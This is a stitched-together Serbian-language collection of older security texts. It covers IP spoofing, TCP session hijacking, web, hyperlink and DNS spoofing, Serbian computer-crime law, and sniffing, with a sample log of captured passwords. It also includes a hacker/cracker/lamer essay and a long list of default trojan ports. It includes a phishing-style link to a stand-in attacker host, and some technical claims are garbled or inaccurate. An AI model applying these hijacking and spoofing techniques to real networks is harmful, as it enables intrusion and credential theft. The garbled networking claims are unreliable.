1. Svima je naravno poznato da svaki komp na netu ima svoju IP kao i serijski broj za za svaki IP paket koji komp posalje na internet. Ovo se moze odraditi ovako:

- IP adresu je moguce dobiti od servera, gledajuci statusbalk od browsera presretanjem paketa (packet sniffing)na networku. Ako jedan sistem ima napr. IP-192.0.0.15 to je jedan klase C network (128+64=192bits) sto znaci da moze da ima max 256 Ip-adrese (192.0.0.1-254) tako   da on pokusava da pogodi jednu adresu u ovom IP-rangeu i da se predstavi serveru kao klient iz njegovog sopstvenog networka (internog). Ako mu to uspe on moze da monitoruje TCP/IP data-stream na networku i posle odredjenog vremena mu moze uspeti da ih na osnovu odredjenog algoritma uspesno predvidi serijske brojeve TCP/IP paketa izmedju klijeta i servera i da tako preuzme ulogu jednog od klijenata na servervom networku i da ga ubedi da dobija informacije od svog klijenta a ustvari ih dobija sa hakerove machine. Na taj nacin haker moze da monitoruje data stream na networku sto ukljucuje login names, passworde, poverljive podatke itd. Ovo se obicno radi kao priprema napada na server ili na neki drugi server na istoj mrezi.


2. TCP-IP paket interception ili aktivno snifovanje. Ovo je jedan od najopasnijih oblika napada na jedan server koji je prikljucen na jedan TCP/IP network. U ovom slucaju haker ne pokusava da pogadja IP-adrese vec presrece TCP/IP konekciju izmedju trusted(verovanog) klijenta na networku i servera i primorava  server da hakerovu masinu na taj nacin prihvata kao trusted-host. Na taj nacin on simulira IP adresu i seriske brojeve TCP/IP paketa od zrtve kompjutera (to je takozvano IP-mimic (imitiranje)). Posto se on sada prestavlja kao trusted  host on baj-pasuje login i password indetifikaciju i moze da prodre do vise obezbedjenih sistema i preuzme kontrolu na njima. Pasivno snifovanje jedan dobro postavljeni network sniffer moze da monitoruje TCP/IP data-stream i da na taj nacin dodje do login namea i passworda od odredjenog racuna i da ga kopromituje i koristi kao bazu za provaljivanje super userovog passworda ili nekog drugog racuna sa visim privilegijama. (sto mu obicno pre ili kasnije uspeva). Isto tako ova tehnika se koristi i kao pocetna faza za sledece vrste napada:


- Napad aktivnom desinhronizacijom

U principu generiradje ogromnog broja ACK-paketa (acknowledgment) zbog prekida veze izmedju klijenta i servera;


- Napad ranom desihronizacijom

Ovo se zasniva na prekidanju veze izmedju klijenta i servera u jednoj ranoj fazi i zapocinjanju nove veze sa  masine napadaca sa (novim) serijskim brojem (a pod identitetom klijenta sa kojim je veza prekinuta);


- Napad sa desihronizacijom sa tzv. "zero-data"

Kao sto mu ime kaze ovaj napad se zasniva na slanju ogromnog broja tzv. Nula data serveru i klijentu (koje ne sadrze nista) koji nisu vidljivi ali primoravaju server i klijent da prekinu konekciju zbog preopterecenjaTCP/IP konekcije;


- Napad na Telnet-sesiju

Izvodi se slanjem velikog broja instrukcija specificnih za Telnet (IAC NOP IAC NOP) koji navodi Telnet protokol da pauzira i ceka sto napadac koristi da bi preuzeo kontrolu nad konekcijom i "umuva se unutra izmedju".


Zastita od ovakvih vrsta napada se sastoji u pazljivom monitorovanj i logovanju svih network aktivnosti i zapisivanju svega neobicnog (na primer neobicno velike procentaze ACK paketa na networku ) kao i u vodjenjem kriptografskih tehnika (Kerber-ove kartice, SSL.S-HTTP, one time passwords, firewalls itd …)




Web tehnike i opasnosti



Jedna od najopasnijih i najinteresatnijih tehnika na Webu je takozvani Web emulation ili virtual-web gde haker peuzima celu ulogu Web servera i naterava vas da verujete da imate vezu sa hakerovom machinom dok vi verujete da imate vezu sa oderedjenim web-serverom.Na taj nacim on ima potpunu kontrolu nad svim podacima u oba pravca. Na primer vi zelite da napravite konekciju da serverom www.mojabanka.com. Ono sto napadac radi je da sve linkove i konekcje loaduje (puni) preko svoje masine dodavanjem na svaki URL-link svoju web-adresu npr www.napadacevamakina.com tako da to postaje http:/napadacevamakina.com/www.mojabanka.com. Na taj nacin svaka  transakcija ide preko hakerove machine i daje mu potpunu kontrolu nad svim podacima u oba pravca (full dupleks).


Hiperlink - imitiranje

Slicna tehnika se koristi i u ovom slucaju samo sto ovo vazi za pojedine linkove sa oderedjene Web-strane (koja moze da bude auteticna) koji bi trebalo da vas odvedu na oderdjenu stranicu a ustvari vas odvode negde sasvim drugde (mada ta stranica izgleda potpuno autenticno). Na primer u HTML programu Web strane (hakovane) stoji ovako nesto:

<A HREF=https://www.napadac.com/getuserinfo
>Click here for free porn !!!</A>

Gde se nalazi oderedjeni program koji grabi od vas poverljive podatke i slaze ih ih u odredjenu databazu. Zato budite extremno oprezni sa slanjm poverljivih podataka preko Web-a cak i preko kriptovanih i "secure" servera jer ni oni nisu 100% zastita i mogu biti hakovani.



Jedna veoma dobrih tehnika je i DNS-mimic gde se potpuno obilazi firewall na taj nacin sto se prvo kod napadacevog DNS servera (koji je zaduzen da prevodi IP-adresa u imena sajtova) stavlja link na stranu sa istim imenom kao strana zrtve (na primer www.sajtzrtve.com) na kojoj se mogu pisati uvredljive stvari o zrtvi postaviti obscene slike ili siriti dezinformacije o zrtvi i propaganda protiv nje, a onda se napda DNS server zrtve (ako nije dobro obezbedjen) gde se menja link za DNS adresu za zrtvinu stranu tako da se povezuje sa DNS serverom napadaca. I Tako ko god na primer ukuca www.serbiancafe.com adresira DNS server napadaca koji ga upucuje na napadacevu Web stranu koju on moze urediti kako hoce...


Drugi nacin baj-pasovanja firewalla je kod organizacija koji koriste dial-up konekcije (paralelno sa LAN) Tako da kompjuter koji se preko modema povezan sa Web-om moze biti napadnit Trjancem ili BO ili necim slicnim a onda biva koriscen kao baza za napad na ostali deo netwerka. Posto napadac ulazi kroj dial-up liniju preko modema on na taj nacim zaobilazi firwall na LAN-u.

Pojam zaštite  elektronskih podataka


Godinama se napad na računarske mreže rešavao dobrim katancem i pravilnim zaključavanjem kancelarije koje imaju računare sa osetljivim podacima. Bilo je dovoljno imati i dva čuvara čiji bi posao bi da paze da neko fizički ne provali u kancelariju i tu na licu mesta pokuša da prisvoji ili uništi određene podatke koje smo hteli da sačuvamo.

Uvođenjem računarske mreže u kancelarijski način rada a posebno sa uvođenjem interneta i klijent/server arhitektura sam  koncept zaštite elektronskih podataka morao je da doživi dramatičnu promenu.

Sada više nije bilo neophodno biti fizički prisutan u prostoriji gde se nalazi računar na kome se nalaze poverljivi podaci. Napad je mogao biti izvršen i iz susedne prostorije ili sa drugog kontinenta, a podaci preneseni bez vidljivog uznemiravanja čuvara koji su sedeli ispred prostorije.

Koncept sigurnosti je sada shvatan ne kao fizičko obezbeđivanje prostorije već kao niz sofisticiranih tehnika i metoda kojim bi sam računarski sistem bio zaštićen i obezbeđen.



Pojam zaštite elektronskih podataka (pravni aspekt)


Predlogom novog krivičnog zakonika definisani su kriterijumi šta se sve može smatrati pod krivičnim prekršajem vezano za temu računara i računarskih komunikacija.

•        Neovlašćeni pristup i korišćenje računarskih sistema i mreža
•        Namerno oštećivanje računarskih programa i podataka- Sabotiranje rada računarskih sistema i mreža
•        Pravljenje virusa i njihovo unošenje u računarske sisteme
•        Ometanje funkcionisanja sistema za elektronsku obradu podataka i računarskih mreža
•        Povreda tajnosti elektronske pošte
•        Sprečavanje ili ograničavanje pristupa računarskim mrežama
•        Neovlašćeno prikupljanje i objavljivanje privatnih fotografija, spisa i ličnih podataka
•        Prisluškivanje
•        Uvreda i kleveta
•        Objavljivanje zabranjenog pornografskog materijala (pedofilija)
•        Posredovanje u vršenju prostitucije
•        Povreda intelektualne svojine (copyright)
•        Narušavanje poslovnog ugleda
•        Oštećivanje mrežnih kablova
•        Terorizam- Špijunaža
•        Izazivanje panike i nereda
•        Udruživanje radi vršenja kriminalnih dela (ugovaranje akcija, prikrivanje dokaza, itd)

Član 34 krivičnog zakona o kompijuterskom kriminalu

Svi ovi predlozi zakona imaju jako dobru osnovu, međutim problem koji se javlja  leži u samom okviru zakona, “Nevin dok se ne dokaže krivim” , jer mogučnost dokazivanja ovakve vrste kriminalnih radnji  graniči se sa teoretskom  neverovatnošću,  iz   jednostavnog razloga što kod nas  nepostoji obučen pravosudni kadar koji  bi  mogao da procesira ovakav slučaj.  Što znači , da ukoliko se  počinilac sam  neprijavi, skoro da nepostoji šansa da mu se uđe u trag.

U Srbiji se trenutno obučava na desetine sudija, tužilaca i branioca za ovu vrstu kriminalnih radnji, tako da će u skorije vreme i kod nas postojati "realniji" strah od zakona na internetu.



Podela mogućih napada na računarsku mrežu


Za samu računarsku mrežu pojmovi blizu ili daleko imaju potpuno promenjeno značenje.

Pod lokalnim pristupom (local access) smatra se rad korisnika koji je uredno prijavljen na računarski sistem i sve radnje obavlja na samom sistemu (rad u shell-u, kontrolisanje elektronske pošte ili surfovanje sa samog računara- lynx ) odnosno kada je početna adresa korisnika jednaka krajnjoj adresi.

Pod pristupom na daljinu (remote access) podrazumevamo rad pri kojem korisnikova početna adresa paketa nije ista kao i krajnja adresa servera na kome radi.

Pojavom UNIX/LINUX kao operativnih sistema koji u potpunosti podržavaju mrežni rad, stvari se još dodatno komplikuju.

Kada korisnik sa svog računara pokušava da inicira sesiju na nekom serveru sam pristup tom serveru se smatra kao pristup na daljinu (remote access) ali sav rad koji obavlja na tom serveru, a tiče se samog boravka na serveru, se smatra radom u lokalu. (primer remote access ssh sesije na jedan server, ali se čitanje pošte iz PINE smatra lokalnim pristupom, jer za taj server sam program i jeste iniciran iz lokala)

Samim tim pri zaštiti računarskih mreža moramo voditi računa i o jednom i o drugom pristupu kao o načinima na koji se potencijalno može ugroziti sigurnost.

Kada pričamo o napadu na računarsku mrežu moramo kvalifikovati sam pojam napada, šta on znači za nas i kako se odražava na nas kao vlasnike računarske mreže.

Napadom na računarsku mrežu se smatra svaka aktivnost koja je usmerena ka tome da izazove ugrožavanje privatnosti, usporavanje ili ometanje normalnog odvijanja procesa rada u samoj računarskoj mreži.

 Sami napadi na računarsku mrežu i sisteme mogu se podeliti na sledeće kategorije:

•        ugrožavanje privatnosti
•        zloupotrebe elektronske pošte
•        potpuno ili delimično prekidanje servisa (Denial of Service)
•        neovlašćeno ulaženje na računarski sistem




Privatnost kao pojam


Privatnost je moć da se kontroliše ono što drugi ljudi znaju o vama. Tačnije: to je mogućnost da se kontroliše istina o vama koju ostali ljudi znaju.

Privatnost je zasnovana na našoj sposobnosti da krijemo istinu.
 
Postoje dve vrste podataka koje zakon pokušava da zaštiti:

1. podaci koje smo nekome poverili, ili podaci koje je neko drugi prikupio o nama,
2. podaci o nama koje držite u tajnosti, koji su samo nama poznati.

Prva vrsta privatnosti koju bi zakon trebao da štiti – jeste privatnost informacija. Ako ste učinili javnom informaciju o vrednosti vaše kuće, stavljajući je pod hipoteku u sudu, ipak želite kontrolu nad dostupnošću tih podataka ostalima. Ili ako ste u apoteci kupili test za proveru trudnoće, i isti platili kreditnom karticom (time otkrivajući svoj identitet), i dalje ne želite da ta informacija bude dostupna svima u vašem gradu.

Druga vrsta privatnosti nam je poznatija: koliko novca imate u novčaniku, šta pišete u pismima svojoj dragoj(om), koje programe gledate na televiziji, šta mislite o javnim ličnostima, političarima...

To su sve informacije koje bi smo želeli da zadržimo samo za sebe.
 
Sama privatnost naši podataka može biti ugrožena i zloupotrebljena na više načina:

Ugrožavanje privatnosti prisluškivanjem gde je cilj sakupiti što više informacija o određenoj osobi

Ugrožavanje privatnosti e-mail poruka – (od strane poslodavca, kolega, trećih lica, državnih organa ...)

Ugrožavanje privatnosti davanjem sakupljenih informacija o nama trecim licima koja su za njih zainteresovana (internet oglašivačima, prodavcima određenih proizvoda i sl.)



Ugrožavanje privatnosti prisluškivanjem


Sam metod prisluškivanja (eng sniffing) zasniva se na osnovnim principima rada mreže gde paketi putuju od jednog do drugog računara pokušavajući da stignu do svoje krajnje odrednice – računara kome želimo da pristupimo.

U svakodnevnom radu i komunikaciji između dva računara najčešće korišćena komanda za prelaz sa jednog na drugi računrar putem mreže je komanda telnet,  stim da se telnet ne uzima kao jedini vid pristupa  ka nekom odredišnom računaru .

Način uspostavljanja veze između dva računara je sledeći (recimo da se  nalazimo na računaru A, a B je računar na koju se "telnetujemo"):

1. A  -----SYN----> B               

2. A <---SYN/ACK--- B     

3. A ACK----> B
 

Najpre računrar A šalje zahtev za otvaranjem konekcije (SYN). Zatim računrar B odgovara sa tzv. SYN/ACK potvrdom da je zahtev za otvaranjem konekcije od strane klijenta A prihvaćen i u trecem koraku klijent uspostavlja vezu sa serverom B.

Recimo da klijent A ima IP adresu 66.66.66.66 a server B 66.66.66.99.

Konekcija koja se formira od mašina A ka mašini B putem koje se šalje sve što mi kucamo će imati oblik: 66.66.66.66.3456-66.66.66.99.23.  Povratne informacije ka klijentu A se šalju putem: 66.66.66.99.23-66.66.66.66.3456.  Pretpostavimo da se A i B nalaze na istoj mreži sa računarima C, D, E, F itd.

 

                                A-------------------------------B
                                                  \     \    \     \
                                                   C     D    E   F

 


Ukoliko neko znatiželjan ima fizički pristup nekom od računara C, D, E, F sve što treba da uradi je da pokrene neki eternet sniffer i svako slovo koje otkucamo će se pojaviti ili u sniff log fajlovima ili na ekranu u zavisnosti od same konfiguracije snifera. Tipičan sniff log izgleda ovako

................vt100..................neko.PaswOrd1.w. ps -u ivana...ls -ald /var/mail/vana....su.idiot96.clear. cd /var/mail.tail -f ivana...more ivana.cat .cd.w.ps -u ivana .finger ivana...cd /var/mail.cat ivana...id


Tačkicama su zamenjeni specijalni karakteri, kao npr ^M za return. Iz ovoga sniff loga moze se lako utvrditi da korisnik neko kao identifikaciju koristi password “PaswOrd1”. Dalje, može se utvrditi da je taj korisnik veoma zainteresovan za korisnicu “Ivana”. Takođe se može primetiti da taj korisnik zna root-ov password i da je putem komande su postao root ( pod pojmom root podrazumevamo fizički pristup hardveru na računaru na kojoj se kao operativni sistem koristi UNIX). Takođe se moze videti da je root-ov password u ovom slučaju “idiot96”, kao i da se korisnik “neko” intenzivno interesuje za sadržaj

mail–a korisnice sa usernamom “ivana”.

Gore navedeni primer je veoma poučan, jer pokazuje koliko je lako ugroziti nečiju sigurnost podataka i da je korišćenje telneta neopravdano i veoma opasno. Dovoljno je sačekati da korisnik pod imenom “neko” ne bude ulogovan na računrar jer bi bilo suludo biti ulogovan na kome su ovi podaci važeći i iskoristiti ih . Računar host neće znati  na osnovu unetih podataka da li je to stvarno korisnik neko ili ne.

Ipak, nameće se pitanje: zašto bi nekoga uopšte zanimao naš username/password? Razlog je veoma jednostavan. Normalne instalacije UNIX-a su na žalost veoma loše napisane. Ponekada je dovoljno samo pribaviti username i password i dobiti root pristup na računaru.

Prisluškivanje (sniffovanje) je veoma popularna tehnika među hakerima, dokonim administratorima, kriminalcima, za sticanje potrebnih informacija. Sem toga računari komuniciraju putem kablova koji oko sebe stvaraju elektromagnetsko polje. Signale koji se šalju moguće je hardverski snimati i zatim kasnije analizirati.

Još lošija situacija je ako je neko root na računaru A sa kojeg se mi npr. telnetujemo, postoji mogućnost da nam jednostavno preuzme telnet sesiju, a isto to je moguće ako se neko nalazi na hostu C koji se nalazi između A i B . Iz svega gore navedenog jasno je da je upotreba telneta ili ftp-a koji na mrežu šalju podatke u izvornom obliku neprihvatljiva.

Komandom traceroute uvek možemo utvrditi sve potencijalne lokacije na kojima možemo očekivati da neko snifuje.

Ako neko poznaje naš username i password, kada se jednom uloguje može da radi šta god poželi sa podacima na našem nalogu. Na svu sreću obični korisnici nemaju mogućnost da pristupaju hardveru, pa samim tim ni da mrežnu karticu prebace u tzv. promiscuous mod rada koji je potreban sniferu da bi preuzimao sve podatke sa lokalne mreze. Ali da sreća ne bude potpuna postoji puno korisnika koji to mogu i čine svakodnevno.
 
Danas se sve manje koristi telnet kao servis za daljinsko pristupanje zbog njegove nesigurnosti .Umesto njega danas se koristi SSH (secure shell) servis koji za razliku od telneta enkriptuje celokupan saobraćaj u komunikaciji između korisnika i servera.

Pored prisluškivanja telnet sesija moguće je prisluškivati i sve ostale TCP/IP sesije koje ne koriste metode kriptovanja. Samim tim znači da je jedan od servisa koji je i doprineo velikoj popularizaciji interneta, e-mail, takođe ugrožen.

Mesta gde se sve može neovlašteno pristupiti jednom e-mailu koji je poslat sa neke udaljene mreže se broje velikim ciframa.
 
O tome da li pojedinac lično smatra da mu je neophodna privatnost njegove elektronske pošte ili ne je njegovo pravo da odluči, ali novi predlog zakona to poistovećuje sa otvaranjem običnih pisama koji se smatra krivičnim delom.

O privatnosti elektronske pošte i samoj vrednosti pisama koja se razmenjuju između firmi, organizacija i institucija i diskusijama koje su o tome vođene u svetu podstiču sve firme koje obavljaju deo svoje komunikacije preko interneta da posvete ogroman deo novca i vremena u sisteme i metode zaštite privatnosti elektronske pošte. Čak je donet  zakon o privatnosti elektronske pošte na radnom mestu kojim se jasno definiše da li i kad poslodavac ima pravo da kontroliše elektronsku poštu svojih zaposlenih.
 
Mislim da bi podizanje ovog pitanja u našoj sredini i na samim fakultetima bilo od velikog značaja za uvođenje normi ponašanja na internetu.

Razlika je velika, i ovaj tekst ce pokusati da vam rasclani ova tri pojma i objasni sta svaki od njih znaci. Mnogi ljudi, posebno oni koji rade u nasim medijima (stampa, radio i tv stanice...) nazivaju sve i svasta hakerima i hakovanjem. Gotovo svako sada moze da ode u neku TV stanicu, kaze da je haker, i odmah ce se oko njega okupiti novinari i traziti od njega intervju. Cak sta vise, intervju ce da urade bez ijednog dokaza da intervjuisu hakera! Na taj nacin ne samo sto pokazuju da su neprofesionalni, vec izazivaju i ogorcenje kod odredjenog broja gledaoca koji su bar malo upuceni u hakersku kulturu.

Pojam haker (eng. hacker) u svom izvornom znacenju opisuje osobu koja se bavi istrazivanjem mogucnosti kompjutera i njihovoj pozitivnoj primeni u svakodnevnom zivotu. Kao sto vidite, ovde se nigde ne spominje da su hakeri zli, da nanose stetu drugima i da su opasni po svet. Hakeri su veoma inteligentne osobe koje istrazuju ono sto je sakriveno u hardveru i softveru. Prostije receno, oni su pronalazaci onoga sto je ili neko sakrio od oci javnosti ili pronalazaci propusta koji su napravljeni greskom! Kod prvog slucaja, kada kazemo 'sakrio' mislimo obicno na programe, mada se i u hardveru moze sakriti dosta toga. Hakeri su po prirodi radoznali ljudi, vole sve da saznaju i ne vole kad je nesto sakriveno od njih. U programima moze dosta toga da se sakrije, narocito u programima ciji je izvorni kod nedostupan javnosti, kakav je ceo Windows i skoro svi programi koji rade pod njim! U takvim programima mogu da se recimo sakriju podprogrami za spijuniranje i programi koji ce samo odabranim ljudima omoguciti pristup zabranjenim resursima, poput vasih hard-diskova.


Moze se, dakle, slobodno reci da hakeri ne vole da neko nekome ugrozava privatnost, i zato proucavaju kompjutere, sa zeljom da nadju uljeze u njima. Oni se zalazu za apsolutnu privatnost, sto je uostalom i ljudsko pravo, i svi bi po pravilu trebali da imaju potpunu privatnost. Takodje, ne vole cenzuru, jer to vodi ka jednoumlju, u sta smo se i uverili u proteklih pola veka! Jednom recju, oni su za apsolutnu ravnopravnost, za razotkrivanje svih tajni i za privatnost. Kod drugog slucaja, ljudi puno puta nesvesno prave greske, koje mogu da se iskoriste za ugrozavanje necije privatnosti. Na primer, programer koji je pisao neku Java funkciju u browseru Internet Explorer je zaboravio da napise rutinu za proveru duzine nekog podatka koji ucitana strana definise. I sada, ako neko pronadje propust i namerno napravi stranu koja iskoriscava propust, i ako neko ko ima pomenuti browser ucita tu stranu, IE ce uraditi nesto sto po pravilu ne bi smeo, i na taj nacin osteti posetioca strane. Hakeri traze takve propuste, i ako ih nadju, obavestavaju svet o tome kako bi proizvodjac datog programa ispravio propust i kako bi ljudi preduzeli odredjene korake i na taj nacin zastitili sebe na vreme.

Hakeri su misljenja da je bolje da svi znaju za odredjeni propust nego da 'niko' ne zna, zato sto veruju da ipak neko zna za propust, i to koristi da bi spijunirao nekoga. Kada ne bi bilo hakera, danas bi imali browsere, mail, news i icq klijente i servere prepunih bezbednosnih propusta, u proseku bi svaki klijent i server imao oko 5 propusta. Do sada je ukupno pronadjeno vise od 10 000 propusta, i pitanje je da li bas niko ne bi znao za te propuste, narocito ako kazemo da je za neke propuste dokazano da su namerno napravljeni! Pitanje 'zasto namerno' je ovde suvisno, i bas zbog ovih razloga hakeri postoje, vredno rade i otkrivaju nove tajne. Dnevno se u proseku oko 5 novih propusta pronadje!

Sa druge strane, hakeri su casni ljudi, posteni, civilizovani, imaju svoju kulturu! Hakerska kultura im ne dopusta da propuste koje otkriju iskoriste u nehumane svrhe. Ako nadju neki propust, oni moraju da obaveste javnost o tome, i ne smeju da ga iskoriste da bi ugrozili neciju privatnost ili napravili stetu bilo kome.

Sada jedan savet kako proveriti da li je doticni haker. Prvo ga pitajte da li je do sada naneo nekome stetu koristeci kompjuter. Ako odgovori potvrdno, ili cak pocne da se hvali time - imate posla sa crackerom, jer hakeri ne nanose stetu drugima. Zatim ga pitajte sta je otkrio. Ako kaze 'nista, koristim vec pronadjene propuste' - imate posla sa lamerom, jer je haker samo onaj koji pronadje nesto jedinstveno, sto jos niko nije pronasao. Upravo zbog toga ne moze svako da bude haker, bas kao sto ne moze svako da bude doktor nauka!

Crackeri (cita se 'krekeri') su isto pronalazaci, inteligetni ljudi, ali oni, izmedju ostalog, koriste svoje znanje i svoja otkrica da bi nekome naneli stetu. Crackeri pisu viruse i trojance, upadaju na servere i prave stetu na njima (uglavnom tako sto izmene prvu stranu sajta).

Lameri su uglavnom klinci, koji nisu nista otkrili i koji takodje nanose stetu drugima, obicno da bi ukrali neku sifru za Internet ili unistili nekome disk koristeci trojance, viruse, pa cak i exploite, koje su crackeri napisali. Oni su gotovani, nauce kako se koriste trojanci i onda prave stetu postenom sveti, misleci da su hakeri. Mnogi od njih ne znaju cak ni kako funkcionise Internet. Cilj im je samo da naprave neku pakost koristeci izum nekog crackera.

Onog trenutka kada haker svojim pronalaskom napravi nekome stetu - odmah prestaje da bude haker i postaje cracker! Sasvim je pogresno reci 'hakeri su uhakovali sajt..', kao i 'hakeri su napravili novog crva...'. Hakeri uopste ne nanose stetu, to cine crackeri i lameri. I potpuno je pogresno mrziti hakere. One koje treba mrziti i prezirati su crackeri i lameri! Hakeri su pronalazaci, naucnici, i ne moze se postati haker preko noci. Profesija 'haker' je veoma cista, postena, plemenita i velikim trudom stecena profesija.

Na kraju, biti haker znaci biti osoba koja ima ogroman koeficijent inteligencije, osoba koja ceo dan provede za kompjuterom proucavajuci ga, osoba koja to cini da bi zastitila ostale korisnike kompjutera i omogucila im potpunu privatnost, osoba koja svojim pronalascima gura covecanstvo ka napretku, i osoba koja uvek moze da vas pogleda u oci!

Izvor: Outlaw crew

Iz prethodnog teksta se uocava razlika u poredjenju hakera, crackera i lamera. Danas bilo ko, ko koristi internet, a sem toga je i cuo za, recimo, google, moze da "tumba" po svetskoj mrezi u potrazi za alatima koji nanose stetu drugim licima na internetu. Alata takve vrste na internetu ima u neogranicenom broju i svakog se dana rapidno povecava.

Situacija bi bila opasnija da lameri znaju koji alat cemu sluzi. Skinu neki programcic sa neta i ako nema nekog tutoriala, odustaju od koriscenja istog. U vecini slucajeva, dosta tog alata je zastarelo i/ili ne moze nauditi bilo kome ko ima bilo koji firewall, (cak i windows-ov). Ovde cu postovati neke od alata, bez opisa.

Neki od mnogobrojnih:

Default-ni  portovi koje koriste sledeci trojanci:


port 0 REx
port 1 (UDP) - Sockets des Troie
port 2 Death
port 5 yoyo
port 11 Skun
port 16 Skun
port 17 Skun
port 18 Skun
port 19 Skun
port 20 Amanda
port 21 ADM worm, Back Construction, Blade Runner, BlueFire, Bmail, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, FreddyK, Invisible FTP, KWM, MscanWorm, NerTe, NokNok, Pinochet, Ramen, Reverse Trojan, RTB 666, The Flu, WinCrash, Voyager Alpha Force
port 22 InCommand, Shaft, Skun
port 23 ADM worm, Aphex's Remote Packet Sniffer , AutoSpY, ButtMan, Fire HacKer, My Very Own trojan, Pest, RTB 666, Tiny Telnet Server - TTS, Truva Atl
port 25 Antigen, Barok, BSE, Email Password Sender , Gip, Laocoon, Magic Horse, MBT , Moscow Email trojan, Nimda, Shtirlitz, Stukach, Tapiras, WinPC
port 27 Assasin
port 28 Amanda
port 30 Agent 40421
port 31 Agent 40421, Masters Paradise, Skun
port 37 ADM worm
port 39 SubSARI
port 41 Deep Throat , Foreplay
port 44 Arctic
port 51 Fuck Lamers Backdoor
port 52 MuSka52, Skun
port 53 ADM worm, li0n, MscanWorm, MuSka52
port 54 MuSka52
port 66 AL-Bareki
port 69 BackGate Kit, Nimda, Pasana, Storm, Storm worm, Theef
port 69 (UDP) - Pasana
port 70 ADM worm
port 79 ADM worm, Firehotcker
port 80 711 trojan (Seven Eleven), AckCmd, BlueFire, Cafeini, Duddie, Executor, God Message, Intruzzo , Latinus, Lithium, MscanWorm, NerTe, Nimda, Noob, Optix Lite, Optix Pro , Power, Ramen, Remote Shell , Reverse WWW Tunnel Backdoor , RingZero, RTB 666, Scalper, Screen Cutter , Seeker, Slapper, Web Server CT , WebDownloader
port 80 (UDP) - Penrox
port 81 Asylum
port 101 Skun
port 102 Delf, Skun
port 103 Skun
port 105 NerTe
port 107 Skun
port 109 ADM worm
port 110 ADM worm
port 111 ADM worm, MscanWorm
port 113 ADM worm, Alicia, Cyn, DataSpy Network X, Dosh, Gibbon, Taskman
port 120 Skun
port 121 Attack Bot, God Message, JammerKillah
port 123 Net Controller
port 137 Chode, Nimda
port 137 (UDP) - Bugbear, Msinit, Opaserv, Qaz
port 138 Chode, Nimda
port 139 Chode, Fire HacKer, Msinit, Nimda, Opaserv, Qaz
port 143 ADM worm
port 146 Infector
port 146 (UDP) - Infector
port 166 NokNok
port 170 A-trojan
port 171 A-trojan
port 200 CyberSpy
port 201 One Windows Trojan
port 202 One Windows Trojan, Skun
port 211 One Windows Trojan
port 212 One Windows Trojan
port 221 Snape
port 222 NeuroticKat, Snape
port 230 Skun
port 231 Skun
port 232 Skun
port 285 Delf
port 299 One Windows Trojan
port 334 Backage
port 335 Nautical
port 370 NeuroticKat
port 400 Argentino
port 401 One Windows Trojan
port 402 One Windows Trojan
port 411 Backage
port 420 Breach
port 443 Slapper
port 445 Nimda
port 455 Fatal Connections
port 511 T0rn Rootkit
port 513 ADM worm
port 514 ADM worm
port 515 MscanWorm, Ramen
port 520 (UDP) - A UDP backdoor
port 555 711 trojan (Seven Eleven), Phase Zero, Phase-0
port 564 Oracle
port 589 Assasin
port 600 SweetHeart
port 623 RTB 666
port 635 ADM worm
port 650 Assasin
port 661 NokNok
port 666 Attack FTP, Back Construction, BLA trojan, NokNok, Reverse Trojan, Shadow Phyre, Unicorn, yoyo
port 667 NokNok, SniperNet
port 668 Unicorn
port 669 DP trojan , SniperNet
port 680 RTB 666
port 692 GayOL
port 700 REx
port 777 Undetected
port 798 Oracle
port 808 WinHole
port 831 NeuroticKat
port 901 Net-Devil, Pest
port 902 Net-Devil, Pest
port 903 Net-Devil
port 911 Dark Shadow, Dark Shadow
port 956 Crat Pro
port 991 Snape
port 992 Snape
port 999 Deep Throat , Foreplay
port 1000 Der Späher / Der Spaeher, Direct Connection, GOTHIC Intruder , Theef
port 1001 Der Späher / Der Spaeher, GOTHIC Intruder , Lula, One Windows Trojan, Theef
port 1005 Pest, Theef
port 1008 AutoSpY, li0n
port 1010 Doly Trojan
port 1011 Doly Trojan
port 1012 Doly Trojan
port 1015 Doly Trojan
port 1016 Doly Trojan
port 1020 Vampire
port 1024 Latinus, Lithium, NetSpy, Ptakks
port 1025 AcidkoR, BDDT, DataSpy Network X, Fraggle Rock , KiLo, MuSka52, NetSpy, Optix Pro , Paltalk, Ptakks, Real 2000, Remote Anything, Remote Explorer Y2K, Remote Storm, RemoteNC
port 1025 (UDP) - KiLo, Optix Pro , Ptakks, Real 2000, Remote Anything, Remote Explorer Y2K, Remote Storm, Yajing
port 1026 BDDT, Dark IRC, DataSpy Network X, Delta Remote Access , Dosh, Duddie, IRC Contact, Remote Explorer 2000, RUX The TIc.K
port 1026 (UDP) - Remote Explorer 2000
port 1027 Clandestine, DataSpy Network X, KiLo, UandMe
port 1028 DataSpy Network X, Dosh, Gibbon, KiLo, KWM, Litmus, Paltalk, SubSARI
port 1028 (UDP) - KiLo, SubSARI
port 1029 Clandestine, KWM, Litmus, SubSARI
port 1029 (UDP) - SubSARI
port 1030 Gibbon, KWM
port 1031 KWM, Little Witch, Xanadu, Xot
port 1031 (UDP) - Xot
port 1032 Akosch4, Dosh, KWM
port 1032 (UDP) - Akosch4
port 1033 Dosh, KWM, Little Witch, Net Advance
port 1034 KWM
port 1035 Dosh, KWM, RemoteNC, Truva Atl
port 1036 KWM
port 1037 Arctic , Dosh, KWM, MoSucker
port 1039 Dosh
port 1041 Dosh, RemoteNC
port 1042 BLA trojan
port 1042 (UDP) - BLA trojan
port 1043 Dosh
port 1044 Ptakks
port 1044 (UDP) - Ptakks
port 1047 RemoteNC
port 1049 Delf, The Hobbit Daemon
port 1052 Fire HacKer, Slapper, The Hobbit Daemon
port 1053 The Thief
port 1054 AckCmd, RemoteNC
port 1080 SubSeven 2.2, WinHole
port 1081 WinHole
port 1082 WinHole
port 1083 WinHole
port 1092 Hvl RAT
port 1095 Blood Fest Evolution, Hvl RAT, Remote Administration Tool - RAT
port 1097 Blood Fest Evolution, Hvl RAT, Remote Administration Tool - RAT
port 1098 Blood Fest Evolution, Hvl RAT, Remote Administration Tool - RAT
port 1099 Blood Fest Evolution, Hvl RAT, Remote Administration Tool - RAT
port 1104 (UDP) - RexxRave
port 1111 Daodan, Ultors Trojan
port 1111 (UDP) - Daodan
port 1115 Lurker, Protoss
port 1116 Lurker
port 1116 (UDP) - Lurker
port 1122 Last 2000, Singularity
port 1122 (UDP) - Last 2000, Singularity
port 1133 SweetHeart
port 1150 Orion
port 1151 Orion
port 1160 BlackRat
port 1166 CrazzyNet
port 1167 CrazzyNet
port 1170 Psyber Stream Server , Voice
port 1180 Unin68
port 1183 Cyn, SweetHeart
